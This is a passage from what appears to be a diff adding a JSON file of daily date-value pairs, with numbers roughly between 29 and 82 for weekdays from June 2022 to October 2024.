"2022-06-14", + 33.527849064552555 + ], + [ + "2022-06-15", + 38.86810121160628 + ], + [ + "2022-06-16", + 33.99717308594067 + ], + [ + "2022-06-17", + 36.476619627274324 + ], + [ + "2022-06-21", + 41.45113274129851 + ], + [ + "2022-06-22", + 41.24496359551329 + ], + [ + "2022-06-23", + 44.287397470546175 + ], + [ + "2022-06-24", + 50.70590619792766 + ], + [ + "2022-06-27", + 49.35082343575741 + ], + [ + "2022-06-28", + 44.11374503196426 + ], + [ + "2022-06-29", + 44.29951162463085 + ], + [ + "2022-06-30", + 42.252024663060205 + ], + [ + "2022-07-01", + 43.724203408765156 + ], + [ + "2022-07-05", + 47.488153278467166 + ], + [ + "2022-07-06", + 48.890522886000014 + ], + [ + "2022-07-07", + 53.3928406859776 + ], + [ + "2022-07-08", + 53.656090148287355 + ], + [ + "2022-07-11", + 48.61368511897337 + ], + [ + "2022-07-12", + 46.524274554785976 + ], + [ + "2022-07-13", + 46.074923904155504 + ], + [ + "2022-07-14", + 47.027560216875315 + ], + [ + "2022-07-15", + 51.710805120418186 + ], + [ + "2022-07-18", + 49.473316842696036 + ], + [ + "2022-07-19", + 56.737035076756285 + ], + [ + "2022-07-20", + 60.02616582648362 + ], + [ + "2022-07-21", + 62.825236352623094 + ], + [ + "2022-07-22", + 57.456539672138206 + ], + [ + "2022-07-25", + 55.8174301094197 + ], + [ + "2022-07-26", + 50.495777352839795 + ], + [ + "2022-07-27", + 59.30553318848568 + ], + [ + "2022-07-28", + 61.10328517240372 + ], + [ + "2022-07-29", + 64.30175833486666 + ], + [ + "2022-08-01", + 64.11088191250363 + ], + [ + "2022-08-02", + 63.112447310406225 + ], + [ + "2022-08-03", + 67.99963022088815 + ], + [ + "2022-08-04", + 68.78530292114483 + ], + [ + "2022-08-05", + 65.73517288936912 + ], + [ + "2022-08-08", + 64.52577870654153 + ], + [ + "2022-08-09", + 60.35238449404119 + ], + [ + "2022-08-10", + 66.10777881272469 + ], + [ + "2022-08-11", + 64.0158505784396 + ], + [ + "2022-08-12", + 67.76305609271938 + ], + [ + "2022-08-15", + 69.2234564355751 + ], + [ + "2022-08-16", + 68.25063347660452 + ], + [ + "2022-08-17", + 63.57588566771451 + ], + [ + "2022-08-18", + 64.12742502941435 + ], + [ + "2022-08-19", + 56.623359741900444 + ], + [ + "2022-08-22", + 48.52680808309166 + ], + [ + "2022-08-23", + 48.29934194468109 + ], + [ + "2022-08-24", + 49.196961600056014 + ], + [ + "2022-08-25", + 54.41468122917468 + ], + [ + "2022-08-26", + 43.15470912005087 + ], + [ + "2022-08-29", + 41.04549885752601 + ], + [ + "2022-08-30", + 38.76275322190771 + ], + [ + "2022-08-31", + 37.60025507262249 + ], + [ + "2022-09-01", + 37.749727123444174 + ], + [ + "2022-09-02", + 34.82854531447347 + ], + [ + "2022-09-06", + 33.43226963833557 + ], + [ + "2022-09-07", + 40.59445735369458 + ], + [ + "2022-09-08", + 42.3435813218491 + ], + [ + "2022-09-09", + 49.17465057130685 + ], + [ + "2022-09-12", + 52.538917381156956 + ], + [ + "2022-09-13", + 39.420165969456775 + ], + [ + "2022-09-14", + 41.568609341615264 + ], + [ + "2022-09-15", + 38.46055356368759 + ], + [ + "2022-09-16", + 37.373971259753596 + ], + [ + "2022-09-19", + 39.696253449577455 + ], + [ + "2022-09-20", + 38.12571100213282 + ], + [ + "2022-09-21", + 34.81953020140105 + ], + [ + "2022-09-22", + 32.75464590991625 + ], + [ + "2022-09-23", + 30.231945714893286 + ], + [ + "2022-09-26", + 29.617805784900852 + ], + [ + "2022-09-27", + 29.766076451255927 + ], + [ + "2022-09-28", + 36.874149077267845 + ], + [ + "2022-09-29", + 31.758173789428284 + ], + [ + "2022-09-30", + 29.2607197179464 + ], + [ + "2022-10-03", + 36.567141594093584 + ], + [ + "2022-10-04", + 44.964045298183564 + ], + [ + "2022-10-05", + 44.85251232704147 + ], + [ + "2022-10-06", + 43.14685433206494 + ], + [ + "2022-10-07", + 36.05631676725736 + ], + [ + "2022-10-10", + 34.514925552896855 + ], + [ + "2022-10-11", + 32.48042087996029 + ], + [ + "2022-10-12", + 32.42976826591382 + ], + [ + "2022-10-13", + 39.39250351470662 + ], + [ + "2022-10-14", + 34.38712533581099 + ], + [ + "2022-10-17", + 42.73686146726617 + ], + [ + "2022-10-18", + 44.61462312828022 + ], + [ + "2022-10-19", + 43.89413044301445 + ], + [ + "2022-10-20", + 42.855295704656285 + ], + [ + "2022-10-21", + 48.820085748227044 + ], + [ + "2022-10-24", + 51.441164126821846 + ], + [ + "2022-10-25", + 56.04918322540266 + ], + [ + "2022-10-26", + 50.43025271826409 + ], + [ + "2022-10-27", + 46.3944132490922 + ], + [ + "2022-10-28", + 53.06893004031098 + ], + [ + "2022-10-31", + 50.421278013662075 + ], + [ + "2022-11-01", + 48.1732341714105 + ], + [ + "2022-11-02", + 41.54918890173634 + ], + [ + "2022-11-03", + 38.41815462898708 + ], + [ + "2022-11-04", + 42.204749929437114 + ], + [ + "2022-11-07", + 44.74597496888992 + ], + [ + "2022-11-08", + 46.445178619131596 + ], + [ + "2022-11-09", + 42.00739637127299 + ], + [ + "2022-11-10", + 56.11382687620394 + ], + [ + "2022-11-11", + 58.99416554546127 + ], + [ + "2022-11-14", + 57.04401527237937 + ], + [ + "2022-11-15", + 59.31428405795851 + ], + [ + "2022-11-16", + 56.12012240401927 + ], + [ + "2022-11-17", + 55.60571265162285 + ], + [ + "2022-11-18", + 55.612738144394875 + ], + [ + "2022-11-21", + 52.99342899837759 + ], + [ + "2022-11-22", + 56.08021375353418 + ], + [ + "2022-11-23", + 58.171306048504896 + ], + [ + "2022-11-25", + 56.26160897142384 + ], + [ + "2022-11-28", + 52.17424979966955 + ], + [ + "2022-11-29", + 50.17878022700595 + ], + [ + "2022-11-30", + 60.02069938082676 + ], + [ + "2022-12-01", + 60.25866496237003 + ], + [ + "2022-12-02", + 59.02884063052989 + ], + [ + "2022-12-05", + 54.04430367050264 + ], + [ + "2022-12-06", + 48.67150698703775 + ], + [ + "2022-12-07", + 47.686468196842526 + ], + [ + "2022-12-08", + 50.78342377729864 + ], + [ + "2022-12-09", + 49.07756195333755 + ], + [ + "2022-12-12", + 52.44221469257125 + ], + [ + "2022-12-13", + 55.20639958805146 + ], + [ + "2022-12-14", + 52.89835533352792 + ], + [ + "2022-12-15", + 43.99412543254067 + ], + [ + "2022-12-16", + 41.9091497049432 + ], + [ + "2022-12-19", + 39.003183829841504 + ], + [ + "2022-12-20", + 38.8448004323283 + ], + [ + "2022-12-21", + 43.45055900027903 + ], + [ + "2022-12-22", + 38.15560122025084 + ], + [ + "2022-12-23", + 38.87503020890281 + ], + [ + "2022-12-27", + 36.03121729923359 + ], + [ + "2022-12-28", + 33.59470703390252 + ], + [ + "2022-12-29", + 41.37301351337187 + ], + [ + "2022-12-30", + 41.24171139611898 + ], + [ + "2023-01-03", + 39.71484979226108 + ], + [ + "2023-01-04", + 41.35167929513462 + ], + [ + "2023-01-05", + 37.71105079243223 + ], + [ + "2023-01-06", + 46.51260972897674 + ], + [ + "2023-01-09", + 48.40475923002023 + ], + [ + "2023-01-10", + 50.868146430362756 + ], + [ + "2023-01-11", + 55.576184760329625 + ], + [ + "2023-01-12", + 56.98680719476751 + ], + [ + "2023-01-13", + 58.7906002813365 + ], + [ + "2023-01-17", + 59.335770128651085 + ], + [ + "2023-01-18", + 54.36239658789058 + ], + [ + "2023-01-19", + 50.93323307180477 + ], + [ + "2023-01-20", + 58.67629164403532 + ], + [ + "2023-01-23", + 63.80625148261051 + ], + [ + "2023-01-24", + 63.014823093121244 + ], + [ + "2023-01-25", + 62.11472111873341 + ], + [ + "2023-01-26", + 66.615981562647 + ], + [ + "2023-01-27", + 68.70054384183328 + ], + [ + "2023-01-30", + 60.37256323319385 + ], + [ + "2023-01-31", + 63.80404701559251 + ], + [ + "2023-02-01", + 68.11096541872196 + ], + [ + "2023-02-02", + 73.85441380391723 + ], + [ + "2023-02-03", + 67.17124033973386 + ], + [ + "2023-02-06", + 64.24424041980325 + ], + [ + "2023-02-07", + 67.9022411491198 + ], + [ + "2023-02-08", + 61.925622724549505 + ], + [ + "2023-02-09", + 59.186721415158665 + ], + [ + "2023-02-10", + 57.181952475321616 + ], + [ + "2023-02-13", + 60.66072362686076 + ], + [ + "2023-02-14", + 62.21062432915115 + ], + [ + "2023-02-15", + 63.81417140362919 + ], + [ + "2023-02-16", + 57.34634981238751 + ], + [ + "2023-02-17", + 55.126181274905235 + ], + [ + "2023-02-21", + 48.40269310538894 + ], + [ + "2023-02-22", + 48.61095243616974 + ], + [ + "2023-02-23", + 51.09436127003954 + ], + [ + "2023-02-24", + 46.42221209699356 + ], + [ + "2023-02-27", + 48.55269632872043 + ], + [ + "2023-02-28", + 48.17760959965312 + ], + [ + "2023-03-01", + 45.810482329098036 + ], + [ + "2023-03-02", + 48.58840227354634 + ], + [ + "2023-03-03", + 54.864546154169666 + ], + [ + "2023-03-06", + 55.19454790134631 + ], + [ + "2023-03-07", + 50.86087867222728 + ], + [ + "2023-03-08", + 52.47700375936103 + ], + [ + "2023-03-09", + 46.70910336040248 + ], + [ + "2023-03-10", + 42.68475792130685 + ], + [ + "2023-03-13", + 45.32618715608355 + ], + [ + "2023-03-14", + 52.66005119327697 + ], + [ + "2023-03-15", + 54.20488322250659 + ], + [ + "2023-03-16", + 61.10909582314779 + ], + [ + "2023-03-17", + 59.33632302433406 + ], + [ + "2023-03-20", + 60.264097692315545 + ], + [ + "2023-03-21", + 63.85130999004119 + ], + [ + "2023-03-22", + 58.37119060545716 + ], + [ + "2023-03-23", + 61.43714523477012 + ], + [ + "2023-03-24", + 62.37439501073978 + ], + [ + "2023-03-27", + 59.46634086598813 + ], + [ + "2023-03-28", + 57.25299944773222 + ], + [ + "2023-03-29", + 62.39926231256371 + ], + [ + "2023-03-30", + 64.81078403075348 + ], + [ + "2023-03-31", + 68.65106230079155 + ], + [ + "2023-04-03", + 67.47288284837526 + ], + [ + "2023-04-04", + 65.78936267017085 + ], + [ + "2023-04-05", + 61.008015337192774 + ], + [ + "2023-04-06", + 62.96784120628809 + ], + [ + "2023-04-10", + 62.6812324848631 + ], + [ + "2023-04-11", + 59.38094453076952 + ], + [ + "2023-04-12", + 55.107587863090025 + ], + [ + "2023-04-13", + 61.63961640748575 + ], + [ + "2023-04-14", + 60.7085530424107 + ], + [ + "2023-04-17", + 60.99405875002431 + ], + [ + "2023-04-18", + 61.016660738167275 + ], + [ + "2023-04-19", + 60.73242254604232 + ], + [ + "2023-04-20", + 56.168127762055796 + ], + [ + "2023-04-21", + 56.64470959795138 + ], + [ + "2023-04-24", + 55.348521096402436 + ], + [ + "2023-04-25", + 45.27443121131045 + ], + [ + "2023-04-26", + 48.46106022108204 + ], + [ + "2023-04-27", + 59.82491317127799 + ], + [ + "2023-04-28", + 62.16606654266341 + ], + [ + "2023-05-01", + 61.51976748465305 + ], + [ + "2023-05-02", + 56.697980968834926 + ], + [ + "2023-05-03", + 53.34877343396656 + ], + [ + "2023-05-04", + 51.590136975165535 + ], + [ + "2023-05-05", + 60.091217208390184 + ], + [ + "2023-05-08", + 60.96990944022578 + ], + [ + "2023-05-09", + 57.477544706994735 + ], + [ + "2023-05-10", + 61.52927730369809 + ], + [ + "2023-05-11", + 62.68871480112021 + ], + [ + "2023-05-12", + 60.52044159910632 + ], + [ + "2023-05-15", + 62.615223025930455 + ], + [ + "2023-05-16", + 63.058985778906745 + ], + [ + "2023-05-17", + 67.50477913505645 + ], + [ + "2023-05-18", + 72.94947256002929 + ], + [ + "2023-05-19", + 71.3584932688597 + ], + [ + "2023-05-22", + 72.3250204798748 + ], + [ + "2023-05-23", + 63.573706487927645 + ], + [ + "2023-05-24", + 60.42773463764904 + ], + [ + "2023-05-25", + 68.38028230361233 + ], + [ + "2023-05-26", + 74.35079888208426 + ], + [ + "2023-05-30", + 75.26635525990109 + ], + [ + "2023-05-31", + 71.79053270796317 + ], + [ + "2023-06-01", + 74.36582902372527 + ], + [ + "2023-06-02", + 75.92045397568972 + ], + [ + "2023-06-05", + 76.06850180637481 + ], + [ + "2023-06-06", + 75.94776617190612 + ], + [ + "2023-06-07", + 64.83547343574702 + ], + [ + "2023-06-08", + 68.41511119083593 + ], + [ + "2023-06-09", + 69.4590087119348 + ], + [ + "2023-06-12", + 73.62443710355532 + ], + [ + "2023-06-13", + 75.30200485700911 + ], + [ + "2023-06-14", + 76.81542361702537 + ], + [ + "2023-06-15", + 79.0939966593378 + ], + [ + "2023-06-16", + 74.85974078987991 + ], + [ + "2023-06-20", + 73.89678973178684 + ], + [ + "2023-06-21", + 65.29747646409075 + ], + [ + "2023-06-22", + 68.65245617765186 + ], + [ + "2023-06-23", + 63.07001638824235 + ], + [ + "2023-06-26", + 56.45163377306402 + ], + [ + "2023-06-27", + 61.90013785372375 + ], + [ + "2023-06-28", + 62.48372230833165 + ], + [ + "2023-06-29", + 61.441699719994375 + ], + [ + "2023-06-30", + 66.11800242180703 + ], + [ + "2023-07-03", + 66.79065567021627 + ], + [ + "2023-07-05", + 66.77431805932409 + ], + [ + "2023-07-06", + 62.137945143835466 + ], + [ + "2023-07-07", + 60.19091524339127 + ], + [ + "2023-07-10", + 60.32258111631153 + ], + [ + "2023-07-11", + 62.34606617757678 + ], + [ + "2023-07-12", + 67.00179678697992 + ], + [ + "2023-07-13", + 72.0654147941259 + ], + [ + "2023-07-14", + 71.91529212602343 + ], + [ + "2023-07-17", + 74.45261128013567 + ], + [ + "2023-07-18", + 76.47631884468137 + ], + [ + "2023-07-19", + 76.28923474359328 + ], + [ + "2023-07-20", + 60.533023924021236 + ], + [ + "2023-07-21", + 58.86864745492499 + ], + [ + "2023-07-24", + 59.50530211768691 + ], + [ + "2023-07-25", + 62.18428685067264 + ], + [ + "2023-07-26", + 60.06961384542344 + ], + [ + "2023-07-27", + 58.53832415675642 + ], + [ + "2023-07-28", + 65.7129449070575 + ], + [ + "2023-07-31", + 65.89821480048452 + ], + [ + "2023-08-01", + 64.23487431607347 + ], + [ + "2023-08-02", + 51.1192382124909 + ], + [ + "2023-08-03", + 50.32878325783928 + ], + [ + "2023-08-04", + 47.99744420451996 + ], + [ + "2023-08-07", + 52.282111922860715 + ], + [ + "2023-08-08", + 47.97143265274773 + ], + [ + "2023-08-09", + 43.0684358057476 + ], + [ + "2023-08-10", + 44.09156666881597 + ], + [ + "2023-08-11", + 41.327452636256915 + ], + [ + "2023-08-14", + 47.52357985334426 + ], + [ + "2023-08-15", + 42.86234268169418 + ], + [ + "2023-08-16", + 38.81458505890317 + ], + [ + "2023-08-17", + 35.164649386782685 + ], + [ + "2023-08-18", + 34.764593573132885 + ], + [ + "2023-08-21", + 43.62160359040325 + ], + [ + "2023-08-22", + 43.05425368345564 + ], + [ + "2023-08-23", + 50.66793685780985 + ], + [ + "2023-08-24", + 42.284565951888204 + ], + [ + "2023-08-25", + 45.71707515871815 + ], + [ + "2023-08-28", + 48.91866842167368 + ], + [ + "2023-08-29", + 56.91819719066058 + ], + [ + "2023-08-30", + 58.73413404924162 + ], + [ + "2023-08-31", + 59.72265103756472 + ], + [ + "2023-09-01", + 59.18215061309948 + ], + [ + "2023-09-05", + 59.65403351169695 + ], + [ + "2023-09-06", + 54.91184634771947 + ], + [ + "2023-09-07", + 51.37237484286529 + ], + [ + "2023-09-08", + 52.0186465043387 + ], + [ + "2023-09-11", + 57.191076648427135 + ], + [ + "2023-09-12", + 51.4985023728546 + ], + [ + "2023-09-13", + 53.20251797336866 + ], + [ + "2023-09-14", + 56.730751051697695 + ], + [ + "2023-09-15", + 48.429624673768345 + ], + [ + "2023-09-18", + 48.911430043643456 + ], + [ + "2023-09-19", + 47.924773125553685 + ], + [ + "2023-09-20", + 41.79805985315459 + ], + [ + "2023-09-21", + 35.64743730133422 + ], + [ + "2023-09-22", + 35.7237082393811 + ], + [ + "2023-09-25", + 38.39599959594125 + ], + [ + "2023-09-26", + 33.61512496060226 + ], + [ + "2023-09-27", + 34.955706400247564 + ], + [ + "2023-09-28", + 39.65214542587488 + ], + [ + "2023-09-29", + 40.06016399513838 + ], + [ + "2023-10-02", + 44.691209354807114 + ], + [ + "2023-10-03", + 37.988903847319925 + ], + [ + "2023-10-04", + 44.78279994687361 + ], + [ + "2023-10-05", + 43.652402032167075 + ], + [ + "2023-10-06", + 51.17692849309617 + ], + [ + "2023-10-09", + 53.257265127234376 + ], + [ + "2023-10-10", + 55.48656300008652 + ], + [ + "2023-10-11", + 58.263740644470055 + ], + [ + "2023-10-12", + 56.404932926843834 + ], + [ + "2023-10-13", + 50.18884780764298 + ], + [ + "2023-10-16", + 54.93867923358523 + ], + [ + "2023-10-17", + 53.33411509257344 + ], + [ + "2023-10-18", + 47.384463651948685 + ], + [ + "2023-10-19", + 43.68979508045243 + ], + [ + "2023-10-20", + 38.57397976954081 + ], + [ + "2023-10-23", + 40.07956680220043 + ], + [ + "2023-10-24", + 44.79191334319925 + ], + [ + "2023-10-25", + 36.86101056967564 + ], + [ + "2023-10-26", + 32.19561366343369 + ], + [ + "2023-10-27", + 34.40405788473785 + ], + [ + "2023-10-30", + 39.41429017798737 + ], + [ + "2023-10-31", + 41.480775992039746 + ], + [ + "2023-11-01", + 48.393476948802714 + ], + [ + "2023-11-02", + 54.54609958722738 + ], + [ + "2023-11-03", + 58.091735137148994 + ], + [ + "2023-11-06", + 59.29304255486821 + ], + [ + "2023-11-07", + 62.02080063905499 + ], + [ + "2023-11-08", + 62.20836787893557 + ], + [ + "2023-11-09", + 58.488804112306624 + ], + [ + "2023-11-10", + 65.01863746898167 + ], + [ + "2023-11-13", + 63.49310354001445 + ], + [ + "2023-11-14", + 68.90038106762219 + ], + [ + "2023-11-15", + 69.0765756355075 + ], + [ + "2023-11-16", + 69.2897976259018 + ], + [ + "2023-11-17", + 69.35181245325343 + ], + [ + "2023-11-20", + 72.47931360817824 + ], + [ + "2023-11-21", + 68.8263017078313 + ], + [ + "2023-11-22", + 69.96809364608573 + ], + [ + "2023-11-24", + 69.02625351477546 + ], + [ + "2023-11-27", + 68.41313335912322 + ], + [ + "2023-11-28", + 69.29419239198003 + ], + [ + "2023-11-29", + 68.52731709886088 + ], + [ + "2023-11-30", + 66.4837775852468 + ], + [ + "2023-12-01", + 67.66012156418088 + ], + [ + "2023-12-04", + 60.23509711405578 + ], + [ + "2023-12-05", + 61.45567108222501 + ], + [ + "2023-12-06", + 57.097032904129804 + ], + [ + "2023-12-07", + 63.74749005389993 + ], + [ + "2023-12-08", + 65.60445105874985 + ], + [ + "2023-12-11", + 68.90680399698249 + ], + [ + "2023-12-12", + 71.66192168991073 + ], + [ + "2023-12-13", + 75.43482846863225 + ], + [ + "2023-12-14", + 74.69565916495387 + ], + [ + "2023-12-15", + 76.10105474317166 + ], + [ + "2023-12-18", + 77.83669289483944 + ], + [ + "2023-12-19", + 79.16679089519965 + ], + [ + "2023-12-20", + 66.5872801290185 + ], + [ + "2023-12-21", + 70.48346910113553 + ], + [ + "2023-12-22", + 70.95782862368604 + ], + [ + "2023-12-26", + 72.88138070334038 + ], + [ + "2023-12-27", + 73.5134293572555 + ], + [ + "2023-12-28", + 73.07466803633297 + ], + [ + "2023-12-29", + 69.12019354511573 + ], + [ + "2024-01-02", + 56.33738578847997 + ], + [ + "2024-01-03", + 50.192409644911294 + ], + [ + "2024-01-04", + 47.507001294327864 + ], + [ + "2024-01-05", + 48.1914098272199 + ], + [ + "2024-01-08", + 58.38543613298668 + ], + [ + "2024-01-09", + 59.228301634398186 + ], + [ + "2024-01-10", + 62.072189238915044 + ], + [ + "2024-01-11", + 62.932773492361754 + ], + [ + "2024-01-12", + 63.15519454549548 + ], + [ + "2024-01-16", + 63.07759438620296 + ], + [ + "2024-01-17", + 58.597054555521815 + ], + [ + "2024-01-18", + 65.24861560827227 + ], + [ + "2024-01-19", + 72.09059426696524 + ], + [ + "2024-01-22", + 72.48238805538868 + ], + [ + "2024-01-23", + 73.74541490944434 + ], + [ + "2024-01-24", + 75.37955195559745 + ], + [ + "2024-01-25", + 75.73937528715257 + ], + [ + "2024-01-26", + 70.3321048576172 + ], + [ + "2024-01-29", + 73.77708245633248 + ], + [ + "2024-01-30", + 68.17833881766485 + ], + [ + "2024-01-31", + 55.03297656246267 + ], + [ + "2024-02-01", + 59.93639210706989 + ], + [ + "2024-02-02", + 65.77307015422939 + ], + [ + "2024-02-05", + 64.97239472916607 + ], + [ + "2024-02-06", + 63.69029078830028 + ], + [ + "2024-02-07", + 67.25114774950897 + ], + [ + "2024-02-08", + 67.86814318515722 + ], + [ + "2024-02-09", + 71.00125606996677 + ], + [ + "2024-02-12", + 68.12947681299842 + ], + [ + "2024-02-13", + 58.08351979717488 + ], + [ + "2024-02-14", + 62.21072343160672 + ], + [ + "2024-02-15", + 63.28614099240073 + ], + [ + "2024-02-16", + 57.86943146703289 + ], + [ + "2024-02-20", + 53.78041628207842 + ], + [ + "2024-02-21", + 51.71001614313593 + ], + [ + "2024-02-22", + 62.91326853805795 + ], + [ + "2024-02-23", + 61.32695111485371 + ], + [ + "2024-02-26", + 61.03138935045981 + ], + [ + "2024-02-27", + 61.933112428549954 + ], + [ + "2024-02-28", + 58.68783412175314 + ], + [ + "2024-02-29", + 62.110658628006355 + ], + [ + "2024-03-01", + 67.28373929254063 + ], + [ + "2024-03-04", + 64.9853347400497 + ], + [ + "2024-03-05", + 54.867646618319874 + ], + [ + "2024-03-06", + 57.327425289517656 + ], + [ + "2024-03-07", + 62.65515859490535 + ], + [ + "2024-03-08", + 55.45632880194071 + ], + [ + "2024-03-11", + 53.76971358307758 + ], + [ + "2024-03-12", + 58.94239370277966 + ], + [ + "2024-03-13", + 55.31729984855161 + ], + [ + "2024-03-14", + 54.149802519592434 + ], + [ + "2024-03-15", + 48.920970515186504 + ], + [ + "2024-03-18", + 52.81143818200817 + ], + [ + "2024-03-19", + 53.810622059897334 + ], + [ + "2024-03-20", + 58.342336062636974 + ], + [ + "2024-03-21", + 60.04719994117022 + ], + [ + "2024-03-22", + 60.47023949722262 + ], + [ + "2024-03-25", + 58.356250510399086 + ], + [ + "2024-03-26", + 56.466542399775165 + ], + [ + "2024-03-27", + 58.0023355770861 + ], + [ + "2024-03-28", + 56.8298633134878 + ], + [ + "2024-04-01", + 57.88092451443507 + ], + [ + "2024-04-02", + 52.28094131124593 + ], + [ + "2024-04-03", + 53.52930486339859 + ], + [ + "2024-04-04", + 44.893515111848586 + ], + [ + "2024-04-05", + 51.312679219866254 + ], + [ + "2024-04-08", + 51.46701736664198 + ], + [ + "2024-04-09", + 53.45845150841089 + ], + [ + "2024-04-10", + 48.394167147840626 + ], + [ + "2024-04-11", + 56.45124891565979 + ], + [ + "2024-04-12", + 48.226746741994596 + ], + [ + "2024-04-15", + 41.59881527766536 + ], + [ + "2024-04-16", + 41.64671170000592 + ], + [ + "2024-04-17", + 37.31163623025168 + ], + [ + "2024-04-18", + 35.47454026204501 + ], + [ + "2024-04-19", + 29.78170193711 + ], + [ + "2024-04-22", + 35.11928382195188 + ], + [ + "2024-04-23", + 42.2097129525294 + ], + [ + "2024-04-24", + 43.735409109706715 + ], + [ + "2024-04-25", + 42.0260897097341 + ], + [ + "2024-04-26", + 48.868844573526694 + ], + [ + "2024-04-29", + 50.548225191094545 + ], + [ + "2024-04-30", + 43.39152215737572 + ], + [ + "2024-05-01", + 41.03746648986812 + ], + [ + "2024-05-02", + 46.51373769968028 + ], + [ + "2024-05-03", + 53.871844014698794 + ], + [ + "2024-05-06", + 57.382062013850785 + ], + [ + "2024-05-07", + 57.43323491407176 + ], + [ + "2024-05-08", + 57.158639947242364 + ], + [ + "2024-05-09", + 57.95798066774431 + ], + [ + "2024-05-10", + 58.85370450871427 + ], + [ + "2024-05-13", + 59.75919879040759 + ], + [ + "2024-05-14", + 62.25852672336722 + ], + [ + "2024-05-15", + 67.56430780296884 + ], + [ + "2024-05-16", + 66.24064034220761 + ], + [ + "2024-05-17", + 65.90809038282629 + ], + [ + "2024-05-20", + 68.357486821509 + ], + [ + "2024-05-21", + 69.03435876563147 + ], + [ + "2024-05-22", + 68.87395768155056 + ], + [ + "2024-05-23", + 65.15887474968422 + ], + [ + "2024-05-24", + 68.93524886903553 + ], + [ + "2024-05-28", + 70.3317483471631 + ], + [ + "2024-05-29", + 64.4849624856264 + ], + [ + "2024-05-30", + 56.808866025938414 + ], + [ + "2024-05-31", + 55.584897344446865 + ], + [ + "2024-06-03", + 58.367973214278194 + ], + [ + "2024-06-04", + 59.759288010270325 + ], + [ + "2024-06-05", + 68.21118227615025 + ], + [ + "2024-06-06", + 67.94269250940982 + ], + [ + "2024-06-07", + 67.21270246946315 + ], + [ + "2024-06-10", + 68.85620794049697 + ], + [ + "2024-06-11", + 71.48218994129917 + ], + [ + "2024-06-12", + 75.71907177929354 + ], + [ + "2024-06-13", + 77.24541133780953 + ], + [ + "2024-06-14", + 78.63548911382355 + ], + [ + "2024-06-17", + 81.52414995620033 + ], + [ + "2024-06-18", + 81.59261504169912 + ], + [ + "2024-06-20", + 74.20634968761388 + ], + [ + "2024-06-21", + 71.79207726189912 + ], + [ + "2024-06-24", + 62.5110811953194 + ], + [ + "2024-06-25", + 67.06444676252053 + ], + [ + "2024-06-26", + 67.8330044151115 + ], + [ + "2024-06-27", + 68.8145519343944 + ], + [ + "2024-06-28", + 64.53860106893893 + ], + [ + "2024-07-01", + 67.0192752267848 + ], + [ + "2024-07-02", + 70.95886257498674 + ], + [ + "2024-07-03", + 73.67592357396943 + ], + [ + "2024-07-05", + 76.64366860974572 + ], + [ + "2024-07-08", + 77.27940122170969 + ], + [ + "2024-07-09", + 77.51953176363406 + ], + [ + "2024-07-10", + 80.2348707803364 + ], + [ + "2024-07-11", + 62.858076638893436 + ], + [ + "2024-07-12", + 64.99709492339616 + ], + [ + "2024-07-15", + 65.9684284980354 + ], + [ + "2024-07-16", + 66.11312329058289 + ], + [ + "2024-07-17", + 48.933792674447105 + ], + [ + "2024-07-18", + 46.88089092701547 + ], + [ + "2024-07-19", + 43.239373318447676 + ], + [ + "2024-07-22", + 50.18167105423601 + ], + [ + "2024-07-23", + 48.64323194183557 + ], + [ + "2024-07-24", + 36.4418622249992 + ], + [ + "2024-07-25", + 33.74034483289371 + ], + [ + "2024-07-26", + 38.27289243125633 + ], + [ + "2024-07-29", + 39.159803341787665 + ], + [ + "2024-07-30", + 35.40736137762613 + ], + [ + "2024-07-31", + 47.02694250232643 + ], + [ + "2024-08-01", + 40.42713296504961 + ], + [ + "2024-08-02", + 35.322550528069186 + ], + [ + "2024-08-05", + 30.273924968958866 + ], + [ + "2024-08-06", + 33.45839811040406 + ], + [ + "2024-08-07", + 31.67573387585327 + ], + [ + "2024-08-08", + 41.1160639477867 + ], + [ + "2024-08-09", + 42.618309897039815 + ], + [ + "2024-08-12", + 43.26444569739973 + ], + [ + "2024-08-13", + 50.23281684157826 + ], + [ + "2024-08-14", + 50.3208489330871 + ], + [ + "2024-08-15", + 56.74105264151265 + ], + [ + "2024-08-16", + 57.05296820850654 + ], + [ + "2024-08-19", + 60.21314847944269 + ], + [ + "2024-08-20", + 59.4506443189697 + ], + [ + "2024-08-21", + 60.64111471338455 + ], + [ + "2024-08-22", + 54.7313648612733 + ], + [ + "2024-08-23", + 57.718654252093955 + ], + [ + "2024-08-26", + 54.2313010268045 + ], + [ + "2024-08-27", + 55.12113649801618 + ], + [ + "2024-08-28", + 51.04897903638383 + ], + [ + "2024-08-29", + 50.53615668739919 + ], + [ + "2024-08-30", + 54.534999953354514 + ], + [ + "2024-09-03", + 44.53994431463004 + ], + [ + "2024-09-04", + 43.82215285911833 + ], + [ + "2024-09-05", + 44.16938249930859 + ], + [ + "2024-09-06", + 37.08074795367587 + ], + [ + "2024-09-09", + 41.78176751980949 + ], + [ + "2024-09-10", + 45.00292051076568 + ], + [ + "2024-09-11", + 51.81190118359931 + ], + [ + "2024-09-12", + 54.60712492499295 + ], + [ + "2024-09-13", + 55.877407382734496 + ], + [ + "2024-09-16", + 54.25767360665122 + ], + [ + "2024-09-17", + 54.42703818732052 + ], + [ + "2024-09-18", + 52.703832017913655 + ], + [ + "2024-09-19", + 60.529230203846836 + ], + [ + "2024-09-20", + 59.70814246425546 + ], + [ + "2024-09-23", + 60.510056245499776 + ], + [ + "2024-09-24", + 61.99628693111698 + ], + [ + "2024-09-25", + 62.29146156149112 + ], + [ + "2024-09-26", + 64.68726622157254 + ], + [ + "2024-09-27", + 61.548961136431515 + ], + [ + "2024-09-30", + 62.49978162343356 + ], + [ + "2024-10-01", + 54.95999395463287 + ], + [ + "2024-10-02", + 55.53765281156172 + ], + [ + "2024-10-03", + 55.134519517057875 + ], + [ + "2024-10-04", + 60.09918129039655 + ], + [ + "2024-10-07", + 54.213619553117134 + ], + [ + "2024-10-08", + 60.028211442560206 + ], + [ + "2024-10-09", + 62.75216287236524 + ], + [ + "2024-10-10", + 62.089382768316106 + ], + [ + "2024-10-11", + 62.673142842985236 + ], + [ + "2024-10-14", + 65.72887133456248 + ], + [ + "2024-10-15", + 57.575537234237245 + ], + [ + "2024-10-16", + 57.62659551185265 + ], + [ + "2024-10-17", + 57.935621163607244 + ], + [ + "2024-10-18", + 60.84784698930582 + ], + [ + "2024-10-21", + 61.69054326641636 + ], + [ + "2024-10-22", + 62.188726043747074 + ], + [ + "2024-10-23", + 51.94951842570329 + ], + [ + "2024-10-24", + 56.013375179751655 + ], + [ + "2024-10-25", + 58.85257659776926 + ], + [ + "2024-10-28", + 58.9287460158246 + ], + [ + "2024-10-29", + 63.281897844725734 + ], + [ + "2024-10-30", + 58.02256053638995 + ], + [ + "2024-10-31", + 44.74667963427891 + ], + [ + 